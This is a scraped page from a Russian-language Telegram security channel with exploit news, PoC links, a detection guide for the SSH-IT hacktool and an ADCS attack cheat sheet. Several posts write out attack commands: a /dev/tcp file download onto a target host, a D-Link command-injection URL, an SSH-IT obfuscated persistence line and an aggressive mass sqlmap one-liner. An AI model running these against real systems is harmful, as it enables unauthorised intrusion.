SecuriXy.kz


Kanal geosi va tili: Qozog‘iston, Ruscha


Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz
Обратная связь - @feedback_securixy_bot
Хахатушки - @memekatz
Hack the Box RUS - @HTB_RUS

Связанные каналы  |  Похожие каналы

Kanal geosi va tili
Qozog‘iston, Ruscha
Statistika
Postlar filtri


tg_image_3441400536.png
81.6Kb
Office_Application_Initiated_Network_Connection_To_Non_Local_IP.yml
10.0Kb
Поговаривают, что зиродей в docs файлах рассылаемых фишингом нашли, в активных публичных образцах песка any.run

https://x.com/anyrun_app/status/1861024182210900357

Ловится сигма-рулом на обращения офисных аппликух на не локальные IP (вложение Office Application Initiated Network Connection To Non-Local IP.yml)

IOC:
SHA256

450221ee3d9144ca03e1058d3ba0e5ad09b4153341676089db9e244662b89800

AV Detection Ratio: 🔴 0 / 62


Наткнулся тут на Roadmap в ИБ на русском от PT аля «Схема карьерных треков в результативной кибербезопасности»

https://cybersecurity-roadmap.ru

С историей кибербеза и описанием ролевых обязанностей и др.

https://github.com/dm-fedorov/cybersecurity-roadmap/blob/main/Роли/Инженер%20по%20сетевой%20безопасности.md


Если не можете накопить на PineApple ну или не хотите, можно превратить целую гору старых ненужных WiFI-роутеров в ананасовый взломщик WiFi сетей.

https://github.com/xchwarze/wifi-pineapple-cloner/blob/master/devices.md

PS. Скоро наш коллега сделает обзор на подобное оживление брошенных роутеров во что-то полезное @haxx_it.


Из разряда «А так можно было?»

Нет нужных сертификатов для соответствия квалификационным требованиям на тендер? – Не беда!

Зачем тратить деньги, время и усилия на повышение квалификации сотрудников, получая международно признанные сертификаты от аккредитованных организаций, если можно просто создать их самостоятельно в неограниченном количестве? 😆 😆


📜 Техники атак на ADCS в табличке

Ребята собрали все техники атак на Active Directory Certificate Services (ADCS) в одну табличку со сводной по тулам, которые могут проэксплуатировать и др.

🔗 Source:
https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64/edit?gid=0#gid=0

Взято с канала APT

#ad #adcs #esc #cheatsheet


APT dan repost
🛡️ Palo Alto PAN-OS Pre-Auth RCE Chain (CVE-2024-0012 & CVE-2024-9474)

A critical vulnerability chain in Palo Alto PAN-OS, combining an authentication bypass (CVE-2024-0012) and a command injection flaw (CVE-2024-9474) in the management web interface, allows unauthenticated attackers to execute arbitrary code with root privileges.

🛠 Affected Versions:
— PAN-OS 11.2 (up to and including 11.2.4-h1)
— PAN-OS 11.1 (up to and including 11.1.5-h1)
— PAN-OS 11.0 (up to and including 11.0.6-h1)
— PAN-OS 10.2 (up to and including 10.2.12-h2)

🔗 Research:
https://labs.watchtowr.com/pots-and-pans-ssl-vpn-palo-alto-pan-os-cve-2024-0012-cve-2024-9474/

🔗 PoC:
https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012

🔗 Exploit:
https://github.com/Chocapikk/CVE-2024-9474

#paloalto #panos #sslvpn #unauth #rce


у CWL скидки от 55-80%

https://cyberwarfare.live/blackfriday/
#blackfriday


Memekatz dan repost
Когда решил узнать статус исправления уязвимостей


Весь год ждали скачух на сертификацию на черную пятницу, нате

https://github.com/0x90n/InfoSec-Black-Friday?tab=readme-ov-file#online-courses--training

#BlackFriday #Promo


RedTeam brazzers dan repost
Всем привет!

С каждым днем лица людей на улице все более сердитые и угрюмые, кое-где успел выпасть снег, а некогда теплые осенние вечера сменились тоскливыми снежными сумерками.

В такое время очень не хватает хорошего списка LPE эксплойтов под винду.

К великому сожалению, я не смог обнаружить актуальный поддерживаемый список сплойтов 2023-2024 годов, впрочем, благодаря каналу 1N73LL1G3NC3, который был предательски снесен администрацией Telegram, у меня получалось достаточно оперативно пополнять свой небольшой лист с гитхабовскими POC.

Поэтому я принял решение о создании своего списка с LPE сплойтами под винду. Получилось собрать практически все POCи, которые выходили с 2023 года.

Ознакомиться можно тут:
https://github.com/MzHmO/Exploit-Street


APT dan repost
🚨 Fortinet FortiManager Unauthenticated RCE (CVE-2024-47575)

The remote code execution vulnerability in FortiManager allows attackers to perform arbitrary operations by exploiting commands via the FGFM protocol, circumventing authentication. Referred to as FortiJump, this vulnerability provides unauthorized access to FortiManager, enabling control over FortiGate devices by taking advantage of insufficient security in command handling and device registration processes.

🛠 Affected Versions:
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

🔗 Research:
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/

🔗 Source:
https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

#fortinet #fortimanager #fgfm #unauth #rce


Давно искал тулину по тесту почтовых серверов - #MailSecOps

Установка:

git clone https://github.com/0xhav0c/MailSecOps.git; cd MailSecOps;
pip install -r requirements.txt

Использование:

python3 MailSecOps.py




Proxy Bar dan repost
Citrix Virtual Apps and Desktops (XEN)
*
Unauthenticated Remote Code execution
*
exploit


🚨 Масштабная утечка данных через уязвимость MOVEit 🚨

Хакер под псевдонимом Nam3L3ss опубликовал данные, полученные через критическую уязвимость в ПО MOVEit, что привело к утечке информации о сотрудниках более 25 крупных компаний, включая Amazon, McDonald’s, HSBC и HP.

Ключевые факты:
Уязвимость: CVE-2023-34362 в MOVEit позволила злоумышленникам обходить аутентификацию и получать доступ к конфиденциальным данным.

Объем утечки: Данные включают имена, адреса электронной почты, номера телефонов и организационные структуры сотрудников.

Пострадавшие компании:
• Amazon — 2 861 111 записей
• HSBC — 280 693 записей
• HP — 104 119 записей
• McDonald’s — 3 295 записей
• И многие другие

Рекомендации:
Эта утечка подчеркивает необходимость своевременного обновления программного обеспечения и усиления мер кибербезопасности.

Источник: InfoStealers


Представьте ситуацию, когда на Linux машину нужно что-то положить но на машине нет привычных стредств типа wget, curl и даже по scp никак.

LoL (living off the land) трюк по загрузке файлов на Linux хост. Будет полезно на всяких экзаменах типа OSCP и тп.


>exec 3/dev/tcp//22

>echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: \r\nConnection: close\r\n\r\n" >&3

>cat linpeas.sh


#linux #lol #upload #tips


ESCalator dan repost
SSH-IT. Инструкция по обнаружению популярного инструмента 🔭

В процессе расследования множества инцидентов, связанных с компрометацией Linux-узлов, мы иногда обнаруживаем на них различные хакерские инструменты.

Сегодня поговорим об SSH-IT. Хакеры часто используют его для перехвата SSH-сессий и получения вводимых пользователем команд.

Для обнаружения признаков установки инструмента на узлах ищите:

1. Файлы по паттерну: '/prng/((askpass|hook|x|ssh_login)\.sh|depth\.cfg|funcs|ptyspy_bin\.[a-z_0-9]+\-(linux|alpine|osx)|seed|ssh|thc_cli)':

find / -type f | egrep -a '/prng/((askpass|hook|x|ssh_login)\.sh|depth\.cfg|funcs|ptyspy_bin\.[a-z_0-9]+\-(linux|alpine|osx)|seed|ssh|thc_cli)'


🧐 Пример:


/home/john/.config/prng/askpass.sh
/home/john/.config/prng/depth.cfg
/home/john/.config/prng/funcs
/home/john/.config/prng/hook.sh
/home/john/.config/prng/ptyspy_bin.aarch64-linux
/home/john/.config/prng/ptyspy_bin.armv6l-linux
/home/john/.config/prng/ptyspy_bin.i386-alpine
/home/john/.config/prng/ptyspy_bin.mips32-alpine
/home/john/.config/prng/ptyspy_bin.mips64-alpine
/home/john/.config/prng/ptyspy_bin.x86_64-alpine
/home/john/.config/prng/ptyspy_bin.x86_64-osx
/home/john/.config/prng/seed
/home/john/.config/prng/ssh
/home/john/.config/prng/ssh_login.sh
/home/john/.config/prng/thc_cli
/home/john/.config/prng/x.sh


2. Файлы, через которые может осуществляться закрепление в системе и в которых встречаются строки по паттерну: '# DO NOT REMOVE THIS LINE\. SEED PRNGD|source.+2\>/dev/null #PRNGD'

egrep -aor '# DO NOT REMOVE THIS LINE\. SEED PRNGD|source.+2\>/dev/null #PRNGD' /


👀 Пример (файл /home/john/.profile):


"# ~/.profile: executed by the command interpreter for login shells.
# DO NOT REMOVE THIS LINE. SEED PRNGD.
source "$(echo 2f686f6d652f6a6f686e2f2e636f6e6669672f70726e672f736565640a|/usr/bin/xxd -r -ps 2>/dev/null)" 2>/dev/null #PRNGD
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n ""$BASH_VERSION"" ]; then
# include .bashrc if it exists
if [ -f ""$HOME/.bashrc"" ]; then
. ""$HOME/.bashrc""
fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d ""$HOME/bin"" ] ; then
PATH=""$HOME/bin:$PATH""
fi

# set PATH so it includes user's private bin if it exists
if [ -d ""$HOME/.local/bin"" ] ; then
PATH=""$HOME/.local/bin:$PATH""
fi"


📃 Рекомендации по дальнейшим действиям:

1️⃣ Заблокировать адреса управляющих серверов;

2️⃣ Удалить файлы, относящиеся к SSH-IT, а также изменить файлы, через которые SSH-IT закрепился в системе;

3️⃣ Перезагрузить скомпрометированный хост;

4️⃣ Осуществить поиск подозрительных входов по сети и проверку логов веб-сервера (если он есть и торчит наружу).

#tip #detect #hacktool #dfir
@ptescalator


🔥 Критическая уязвимость в D-Link хранилках 🔥

🚨 CVE-2024-10914 — Обнаружена уязвимость в моделях D-Link DNS-320, DNS-320LW, DNS-325 и DNS-340L (версии до 28 октября 2024 года), позволяющая удалённым злоумышленникам выполнять произвольные команды.

🔴 Детали: Уязвимость связана с недостаточной проверкой параметра name в функции cgi_user_add файла /cgi-bin/account_mgr.cgi?cmd=cgi_user_add, что может привести к выполнению произвольных команд на устройстве.

💡 Рекомендации: D-Link не планирует выпускать обновления для этих моделей, так как они достигли конца жизненного цикла. Рекомендуется заменить устройства на поддерживаемые модели или, как временное решение, ограничить доступ к ним из внешних сетей.

🔗 PoC GitHub


/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;;%27


Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
Автоматизация для ленивых багхантеров или One-Liner для автоматизации сбора и разбора URL-адресов при тестировании на SQL-инъекции по доменному имени:


waybackurls | grep '='| httpx --silent --status-code| awk '{print $1}'| xargs -I{} sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'

#SQLi #waybackurls #sqlmap



20 ta oxirgi post ko‘rsatilgan.